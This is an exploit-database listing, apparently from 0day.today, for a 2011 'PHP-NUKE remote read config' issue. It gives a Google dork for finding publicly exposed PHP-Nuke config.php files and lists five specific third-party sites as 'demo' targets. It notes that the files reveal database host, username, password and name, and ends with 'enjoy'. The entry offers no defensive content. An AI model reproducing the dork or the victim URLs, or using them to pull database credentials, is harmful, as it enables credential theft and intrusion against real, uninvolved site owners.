[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP-NUKE Remote read config Vulnerability

Author
Angel Injection
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16474
Category
web applications
Date add
06-07-2011
Platform
php
# Exploit Title:PHP-NUKE remote read config Vulnerability
# Date: 6/6/2011
# Author: Angel Injection
# home Page: http://www.club-h.co.cc
# Email: Angel-Injection[at]hotmail.com
# Vendor or Software Link:http://phpnuke.org
# Version: n/a
# Category:: webapps
# Google dork:inurl:config.php dbuname dbpass intext:"PHP-NUKE"
# Tested on: Linux Back Track 5
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Demo site:
http://nelsem.by.ru/config.php
http://home.arcor.de/only88/config.php
school47-forum.on.ufanet.ru/config.php
http://sagv.gyakg.u-szeged.hu/tanar/birozsol/CONFIG.PHP
http://213.97.130.124/home/php/config.php

In File Config.php

We Have
1-dbhost
2-dbuname
3-dbpass
4-dbname
And enjoy


-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----
Greetz To :1337day Team
Thanks to all the people of Iraq And Club Hack Team

#  0day.today [2024-12-24]  #